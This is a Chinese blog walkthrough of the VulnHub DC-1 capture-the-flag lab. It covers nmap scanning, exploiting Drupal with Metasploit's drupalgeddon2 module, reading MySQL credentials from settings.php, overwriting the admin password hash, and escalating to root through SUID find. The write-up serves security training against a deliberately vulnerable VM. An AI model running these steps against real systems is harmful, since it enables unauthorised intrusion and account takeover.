【vulnhub靶场】-dc1

最新推荐文章于 2024-05-07 16:35:55 发布
最新推荐文章于 2024-05-07 16:35:55 发布
阅读量343 收藏
点赞数
分类专栏: vulnhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43446292/article/details/124125050
版权

1、环境配置:
kali:88.16.153.33
dc1:88.16.153.36
补充:kali需设为桥接模式,因为dc靶机打开需要登录,kali设为桥接模式后与dc1在同一个局域网内,可以在kali中扫描得知dc1的ip地址;dc1的下载地址:https://www.vulnhub.com/entry/dc-1-1,292/
需要找到5个flag.txt
2、信息收集:
2.1 使用arp-scan -l,探测存活主机,也可使用nmap 88.16.153.33/24(较慢)
在这里插入图片描述

2.使用nmap查询开放端口,开放了22、80、111端口
在这里插入图片描述
3、渗透
3.1 经过信息收集,得知CMS为drupal7,百度drupal7存在的漏洞,发现一个sql注入漏洞,进行检测时也有sql报错,但利用此漏洞添加账号密码未成功(可能是我利用过程出错)
3.2 然后在kali中启动msfconsole,查找一下可用的exp
在这里插入图片描述
选择18年的,其他的利用未成功
use exploit/unix/webapp/drupal_drupalgeddon2
options
set RHOST 88.16.153.36
run
在这里插入图片描述
在这里插入图片描述
在meterpreter shell下执行的命令有限,输入shell命令进入目标机Shell下面,接着输入python -c ‘import pty;pty.spawn(“/bin/bash”)’,生成一个交互shell
在这里插入图片描述
使用ls,查看当前目录下有无flag.txt
在这里插入图片描述
切换到根目录,查看系统中存在flag文件
在这里插入图片描述
尝试查找文件内容中包含flag的文件,grep -r flag / ,太多了,所以先去查看flag1.txt和flag4.txt在这里插入图片描述
flag1.txt中提到了配置文件,百度一下drupal的配置文件为settings.php,使用
find / -name settings.php的文件目录
在这里插入图片描述
查看该文件内容,发现了flag2,暴力和字典攻击不是只有获得访问权限的方法(您将需要访问权限),下面还有mysql数据库的用户名密码,那么应该是需要连接mysql数据库,mysql -u dbuser -p,然后输入密码
在这里插入图片描述
show databases;
use drupaldb;
show tables;
select * from users;
在这里插入图片描述
可以得到owned,对应加密密码 S S SD4MRokGzqKd1pGaX7iHhpXVkE1uaWaOfoDVxIIbzk40jpnwVWeVN
可以得到fred,对应加密密码 S S SD4MRokGzqKd1pGaX7iHhpXVkE1uaWaOfoDVxIIbzk40jpnwVWeVN
可以破解对应密码(使用hashcat),也可以新增或者修改用户名密码(这里密码一样,是我在第一次练靶场时,进行了修改)
百度drupal更改管理员密码的方法,参考https://drupalchina.cn/node/2128,
在这里插入图片描述
连接mysql数据库,对密码进行更改
update users set pass=“ S S SDZHLkCVdzoD61OZrPFDwSDKEVwjJOccHTcyBAoxHUoBKFtnqx/EC” where uid=1;
在这里插入图片描述
访问网站进行登录
在这里插入图片描述
获得flag3,目前已获得flag1、flag2、flag3、flag4
查看flag4,cat /home/flag4/flag4.txt
在这里插入图片描述
需要查看root目录下,那就需要提权,首先进行信息收集,测试是否可以进行内核溢出漏洞、suid等
首先是内核溢出漏洞提权:
在本地搭建一个临时的web站点,在获得的shell中找一个可执行的目录,然后远程下载linux-exploit-suggester-2.pl
在这里插入图片描述
不存在;
尝试suid提权,查找具有root权限的SUID的文件
在这里插入图片描述
find可以利用,使用find 提权find . -exec /bin/sh ; -quit,提权成功,找到最后一个flag
在这里插入图片描述

weixin_43446292
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
Romax学习资料-DC1模块-载荷谱处理
03-14
### Romax学习资料-DC1模块-载荷谱处理 #### 一、直方图法 ##### 1.1 简介 在Romax软件的DC1模块中,直方图法是一种常用的载荷谱处理方法。这种方法主要用于对原始数据进行统计分析,并通过构建直方图来获取不同...
vulnhub靶机练习--DC1
qq_34516733的博客
12-24 3621
DC-1靶机详情靶机安装靶机练习信息收集漏洞利用功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 靶机详情 靶机地址:https://www.vulnhub.com/entry/dc-1-1,292/ 靶机描述: DC-1 是一个
玩转靶机VulnhubDC1(详细)
weixin_51566481的博客
07-26 794
新手靶机dc1,msfconsole,suid提权
[Vulnhub靶机] DC-1
最新发布
haosha。的博客
05-07 4083
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
DC靶场系列--DC1
BGiscool的博客
06-28 4868
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
渗透靶场--DC1
weixin_45794666的博客
07-20 582
DC1 攻击机ip:192.168.1.164 靶机ip:192.168.1.163 目标:获取靶机上的5个flag 1.内网渗透,先利用namp扫描整个网段 目标机为192.168.1.163 2.继续nmap嗅探端口信息,。 开放了22/80/111/56771端口 3.那就访问80端口 是一个网站 CMS为Drupal 4.使用dirseach扫描网站目录,扫出了一个robots.txt # # robots.txt # # This file is to prevent the crawli
DC1靶机】
qq_40646572的博客
05-01 365
信息收集 开启靶机。 使用namp扫描进行信息搜集。 全端口扫描,查看是否有超过1000的端口。nmap扫描后,发现仅存在22端口以及80端口处于开放状态。说明ssh服务以及http服务正在运行,靶机突破点。 首先搜集http服务信息。 打开http服务,获取cms信息,发现是Drupal7框架。 习惯性使用nmap漏洞脚本扫描,发现惊喜。drupal7.x存在Sql注入漏洞。 漏洞利用 打开亲爱的msf,搜索下是否存在直接利用的exp,发现存在可以直接利用的exp。 设置好rhost以及相应
docker-compose version 1.23.0,build c8524dc1
09-01
centos7安装docker后,并没有安装docker-compose,而且很多源里没有,无法通过yum安装,wget github的源码,有时候会很慢,这里提供一个现成的,源码编译好的docker-compose。centos7安装docker和docker-compose,...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
ST_DC1-configs:DC1子卡的Machinekit配置文件(对于DE10-Nano)
02-21
ST_DC1-配置 DC1子卡的机器套件配置文件(对于DE10-Nano) 用于ShadeTechnik DC1子卡的DE10-Nano硬件测试和设置的Machinekit Hal和GUI文件。 仍在进行中,可能会进行修订。
DC1_2012.06.tar.gz
07-01
Design Compiler Workshop中实验部分配套的资料,非常实用
VulnHubdc1靶场(3)
p_utao的博客
02-20 210
靶场信息: 地址:https://www.vulnhub.com/entry/dc-1-1,292/ 难度:简单 目标:有五个标志,但是最终目标是在根目录的主目录中找到并读取该标志 运行:vm work 信息收集 nmap直接扫描网段存活主机 扫描常见端口 nmap 10.7.10.29 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 04:14 EST Nmap scan report for 10.7.10.29 Host is u
vulnhub靶机DC1
weixin_52450702的博客
10-29 936
靶机DC1IP:192.168.70.160。
DC-1靶机渗透
plant1234的博客
04-17 1173
简介 靶机名称:DC1 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 一、信息收集 利用nmap扫描发现主机: nmap -sP 192.168.229.0/24 获取主机为:192.168.229.180 收集主机端口和其它信息: nmap -sS -sV -T5 -A -p- 192.168.229.180 发现开发22端口和80端口,并且运行在Linux上 二、漏洞查找 发现有80端口直接访问得到: 发现是cms是drupal,用msf看一
Vulnhub - DC-1
qq_46081990的博客
03-14 374
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub系列之DC1靶场详解
weixin_54960572的博客
08-09 325
提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束;目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件。因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。若不指定,则修改表中所有的行。尝试验证后发现编号为1的exp可以利用,选择进入。提示shadow,在Linux系统中
DC-1靶场(CVE-2018-7600)
lionwerson的博客
10-14 1814
1.下载DC-1靶场: DC-1下载地址https://download.vulnhub.com/dc/DC-1.zip2.解压打开靶场,导入虚拟机网络模式改为桥接模式,打开虚拟机。 3.浏览器访问80端口,其实也可以先用nmap扫描一下端口。 是一个Drupal CMS。 4.先挂扫描器走一波。 发现存在CVE-2018-7600的Drupal的一个RCE,并且小于7的版本都可以,这个应该就是这个靶场的主要漏洞了。 poc如下: 漏洞存在,验证 poc: #!/usr/b..
python实现ECC算法编写以下题目:参数选取p=11,椭圆曲线为y^2=x^3+v+6,Ep(1,6)的一个生成元为G=(2,7)私钥d=7,用户A的公钥P=dG=(7,2)明文M=(9,1),加密:明文M=(9,1),用户B随机选取数k=6,由c1=kG,c2=M+k*PA得到密文为c3,解密:c2-dc1=(9,1)给出完整代码和结果
06-03
代码如下: ```python p = 11 v = 6 a = 1 b = 6 d = 7 k = 6 G = (2, 7) M = (9, 1) ... lam = ((b[1]-a[1]) * pow(b[0]-a[0], p-2, p)) % p ...注:此代码仅供参考,实际应用中还需要进行一些安全性考虑,如选择更大的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值